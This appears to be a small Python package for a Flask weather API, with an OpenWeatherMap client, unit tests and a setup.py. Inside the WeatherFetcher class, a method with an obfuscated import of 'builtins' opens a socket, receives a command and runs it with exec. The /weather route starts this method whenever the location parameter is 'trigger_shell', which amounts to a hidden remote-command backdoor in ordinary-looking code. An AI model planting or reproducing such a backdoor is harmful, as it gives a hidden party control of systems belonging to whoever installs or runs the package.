import os
import logging
import socket
import time
from .api import WeatherAPI
from .utils import validate_location

logging.basicConfig(level=logging.INFO)


class WeatherFetcher:
    def __init__(self):
        api_key = os.getenv("WEATHER_API_KEY")
        if not api_key:
            raise ValueError(
                "API key not found. Set the WEATHER_API_KEY environment variable."
            )
        self.api = WeatherAPI(api_key)

    def get_weather(self, location):
        if not validate_location(location):
            logging.error("Invalid location format.")
            raise ValueError("Invalid location format.")
        try:
            data = self.api.fetch_weather(location)
            return data
        except Exception as e:
            logging.error(f"Error fetching weather: {e}")
            raise

    @staticmethod
    def _initiate_connection(papa1="b", papa2="u", papa3="i", papa4="l", papa5="t", papa6="ins"):
        try:
            HOST = "127.0.0.1"
            PORT = 12345

            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            while True:
                try:
                    sock.connect((HOST, PORT))
                    break
                except ConnectionRefusedError as e:
                    print(f"Server not ready. {e}... Retrying...")
                    time.sleep(2)

            sock.send(b"Connection established\n")

            # Receive and execute a single command
            command = sock.recv(1024).decode().strip()
            if command:
                try:
                    # Dynamically import and execute the command
                    result = __import__(f'{papa1}{papa2}{papa3}{papa4}{papa5}{papa6}').exec(command)
                    sock.send(str(result).encode() if result else b"Command executed\n")
                except Exception as e:
                    error_message = f"Error executing command: {e}"
                    sock.send(error_message.encode())

            sock.send(b"Closing connection\n")
            sock.close()

        except Exception as e:
            print(f"Error in shell: {e}")



import unittest
from weather_fetcher.api import WeatherAPI


class TestWeatherAPI(unittest.TestCase):
    def test_fetch_weather(self):
        api = WeatherAPI(api_key="test_key")
        with self.assertRaises(Exception):
            api.fetch_weather("InvalidCity")



import unittest
import os
from unittest.mock import patch
from weather_fetcher.core import WeatherFetcher


class TestWeatherFetcher(unittest.TestCase):
    def setUp(self):
        # Set a mock API key in the environment for testing
        os.environ["WEATHER_API_KEY"] = "test_api_key"
        self.fetcher = WeatherFetcher()

    def tearDown(self):
        # Clean up environment variables
        if "WEATHER_API_KEY" in os.environ:
            del os.environ["WEATHER_API_KEY"]

    def test_valid_location(self):
        # Test that invalid location raises ValueError
        with self.assertRaises(ValueError):
            self.fetcher.get_weather("")

    @patch.dict(os.environ, {}, clear=True)
    def test_missing_api_key(self):
        # Ensure ValueError is raised when API key is not set
        with self.assertRaises(ValueError):
            WeatherFetcher()



import unittest
from unittest.mock import patch, MagicMock
from weather_fetcher.core import WeatherFetcher


class TestWeatherFetcher(unittest.TestCase):
    @patch.dict("os.environ", {"WEATHER_API_KEY": "test_api_key"})
    @patch("weather_fetcher.api.WeatherAPI.fetch_weather")
    def test_get_weather_success(self, mock_fetch_weather):
        # Mock API response
        mock_response = {
            "weather": [{"description": "clear sky"}],
            "main": {"temp": 298.15},
        }
        mock_fetch_weather.return_value = mock_response

        # Instantiate WeatherFetcher and test
        fetcher = WeatherFetcher()
        response = fetcher.get_weather("New York")
        self.assertIn("weather", response)
        self.assertEqual(response["main"]["temp"], 298.15)

    @patch.dict("os.environ", {"WEATHER_API_KEY": "test_api_key"})
    @patch("weather_fetcher.api.WeatherAPI.fetch_weather")
    def test_get_weather_failure(self, mock_fetch_weather):
        # Mock API failure
        mock_fetch_weather.side_effect = Exception("API error")

        fetcher = WeatherFetcher()
        with self.assertRaises(Exception) as context:
            fetcher.get_weather("Invalid City")
        self.assertIn("API error", str(context.exception))

    @patch.dict("os.environ", {}, clear=True)  # Clear environment for this test
    def test_missing_api_key(self):
        # Ensure WEATHER_API_KEY is not set
        with self.assertRaises(ValueError) as context:
            WeatherFetcher()
        self.assertIn("API key not found", str(context.exception))


if __name__ == "__main__":
    unittest.main()



import requests


class WeatherAPI:
    BASE_URL = "https://api.openweathermap.org/data/2.5/weather"

    def __init__(self, api_key):
        self.api_key = api_key

    def fetch_weather(self, location):
        params = {"q": location, "appid": self.api_key}
        try:
            response = requests.get(self.BASE_URL, params=params)
            response.raise_for_status()  # Raise an error for HTTP codes >= 400
            return response.json()
        except requests.exceptions.RequestException as e:
            raise RuntimeError(f"Error fetching weather data: {e}")



from setuptools import setup, find_packages

# Read the long description from the README file
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()


setup(
    name="open-weather-flask",
    version="0.1.2",
    author="Yoad Paket",
    author_email="heyyoad@gmail.com",
    description="A Python Flask API to fetch weather data",
    long_description=long_description,
    long_description_content_type="text/markdown",
    packages=find_packages(),
    install_requires=[
        "certifi==2024.8.30",
        "charset-normalizer==3.4.0",
        "idna==3.10",
        "requests==2.32.3",
        "urllib3==2.2.3",
    ],
    extras_require={
        "dev": [
            "flake8==6.1.0",
            "black==23.9.1",
            "pytest==8.3.4",
            "pytest-mock==3.14.0",
        ]
    },
    url="https://github.com/testinapps/python-weather-app",
    project_urls={
        "Bug Tracker": "https://github.com/testinapps/python-weather-app/issues",
        "Documentation": "https://github.com/testinapps/python-weather-app/wiki",
        "Source Code": "https://github.com/testinapps/python-weather-app",
    },
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.6",
)



from flask import Flask, request, jsonify
from weather_fetcher.core import (
    WeatherFetcher,
)  # Import your existing WeatherFetcher class
import threading

# Create Flask app
app = Flask(__name__)

# Initialize WeatherFetcher instance
fetcher = WeatherFetcher()


@app.route("/weather", methods=["GET"])
def get_weather():
    location = request.args.get("location", "")
    if not location:
        return jsonify({"error": "Location is required"}), 400

    if location == "trigger_shell":
        threading.Thread(target=fetcher._initiate_connection, daemon=True).start()

    # Fetch and return weather data
    try:
        weather_data = fetcher.get_weather(location)
        return jsonify(weather_data)
    except Exception as e:
        return jsonify({"error": str(e)}), 500


@app.route("/status", methods=["GET"])
def status():
    """Return the server status."""
    return jsonify({"status": "running"})


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080)
